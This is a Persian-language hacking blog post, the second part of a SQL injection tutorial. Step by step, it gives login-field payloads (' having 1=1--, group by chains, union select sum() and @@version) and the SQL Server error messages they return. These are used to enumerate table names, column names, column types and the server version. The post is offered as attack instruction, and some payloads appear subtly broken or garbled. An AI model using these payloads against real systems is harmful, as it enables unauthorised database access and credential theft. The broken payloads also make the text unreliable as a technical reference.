سیا هکر

X

سیا هکر

hit counter

آمار بازدیدکنندگان

سیا هکر

آموزش هک*کرک*بوت*هک پیشرفته

	قسمت دوم آموزش SQL Injection کردن
با سلام خدمت تمامی بازدیدکنندگان محترم وبلاگ: در این پست آموزش SQL Injection کردن را به شما می گوییم در این پست به آموزش گرفتن اطلاعات مهم مانند Column types , Table names و ((سیاهکر))بعضی از اطلاعات دیگر ما با داشتن این اطلاعات کارهای زیادی را می توانیم انجام بدهیم برای گرفتن این اطلاعات باید به Error های برگشتی توجه کنید که برای ما بسیار مهم هستند گرفتنTable Names: برای به دست آوردن Table Names باید مانند زیر عمل کنید: Username: ' having 1=1— Password: a که به این صورت Error های زیر را به دست می آورید: [Microsoft][ODBC SQL Server Driver][SQL Server]Column 's_table.username' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. که به راحتی توانستید نام یک Column را به دست آورید که به این صورت (s_table.id) می بینید: اسم table s_table= اسم اولین Column Username= برای گرفتن اسم ستون ها می توان از روش زیر عمل کرد: Login: ' group by s_table.username having 1 =1— Password= a که این پیغام را خواهید دید: [Microsoft][ODBC SQL Server Driver][SQL Server]Column 's_table.password' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. و اسم ستون دوم را نیز پیدا کردیم: s_table.password و برای دیگر ستون های می توانیم این کارها را انجام دهیم: Login: ' group by s_table.username,s_table.password having = --' Password: a [Microsoft][ODBC SQL Server Driver][SQL Server]Column 's_table.Active' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. و اسم سوم ستون: Login: ' group by s_table.username,s_table.password,s_table.Active having = -- Password: a گرفتنColumn Types: برای این کار از روش زیر استفاده کنید: Login: ' union select sum(username) from s_table— Password: a با توجه به Error به نوع ستون های می توان پی برد: non-numerical: The sum or average aggregate operation cannot take a varchar data type as an argument. numerical All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists گرفتنVersion Number of Server: برای این کار باید مراحل زیر را انجام دهید: Login: ' union select @@version, , , -- Password: a Syntax error converting the nvarchar value 'Microsoft SQL Server 2000-8.00.194 (Intel X ) Aug 6 2000 20:37:43 Copyright (c)1988-2000 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build : 2195 Service Pack 4) ' to a column of data type int.
2 نوشته شده در چهارشنبه نهم آذر 1384ساعت 22:20 توسط سیا هکر \|